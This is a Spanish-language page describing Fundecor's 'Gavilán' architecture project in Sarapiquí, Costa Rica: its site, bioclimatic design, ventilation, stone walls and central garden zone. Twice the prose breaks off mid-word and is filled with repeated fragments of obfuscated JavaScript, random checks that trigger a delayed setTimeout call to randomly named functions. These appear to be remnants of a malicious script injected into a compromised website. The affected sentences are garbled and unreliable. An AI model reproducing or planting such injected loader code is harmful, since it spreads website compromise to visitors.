Fundecor

Proyecto Fundecor: GAVILÁN

Localización

Ubicado en la zona norte del país, el Cantón de Sarapiquí es el número 10 de la Provincia de Heredia. Colinda con la Reserva Forestal Cordillera Volcánica Central, de la que parte de ella se encuentra dentro del cantón, la Reserva Nacional de Fauna Silvestre Barra del Colorado, el Parque Nacional Braulio Carrillo y la Reserva Biológica La Selva.

Área del Sitio.

11ha. 4556.89 m2

Area de proyecto: 550m2

Concepto:

Nacido bajo una filosofía de adaptación al sitio, buscandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando una simbiosis del lugar. Se desarrolla bajo tres principales ejes que generan una conectividad al espacio central o MULTI ZONA Los ejes se toman de una estructura de campo que se muestra en L3 axionométrico de BIOCAPAS. El eje principal de acceso remata en el espacio MULTIZONA y el eje secundario remata con un ARBOL

Pentaclethra macroloba (gavilán). Razón de ser de nuestro seudónimo. Utilizamos rescate y uso materiales de la zona.

El proyecto genera una arquitectura bioclimática, interior-exterior, para tener máximo confort climático con un mínimo de consumo de energía creandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ventanales altos y utilizar corrientes de vientos naturales y minimizar el uso del aire acondicionado.

El aprovechamiento de la luz natural vital en el proyecto Gavilán para minimizar el uso de energía electrica, el oxigeno y renovación de aire se hará haciendo ventilaciones cruzadas que atraviesen los muros de piedra de los espacios exteriores e interiores. ver diagrama de flujos en la lámina L4. La circulación de aire renovada, evitara el sindrome de edificio enfermo.

En su exterior se ubican estrategicámente muros de piedra (material de la zona) material que amortigua la radiación solar y genera frescura al interior, a su vez

amortigua el golpe de bochorno. Acompañado a esto incorporamos un canal del agua o espejo de agua ubicado desde el acceso hacia el espacio central

CRITERIO TEORICO Y FILOSOFICO .( L1)

CONTEXTO ( L1)

CLIMA (ver L4) o M U L T I Z O N A , donde se intersectan los recorridos y circulaciones interiores del edificio, presentándose como un vivero de vegetación autóctona

o jardin central de plantas y flores de la zona acompañado de un mariposario, y aves que se encuentre en Puerto Viejo de Sarapiqui.

El interior con multi espacio o multi zona genera un microclima que ayudara a controlar la temperatura y ajustarse a las normas permitidas por ASHARE y evitar edificio enfermo.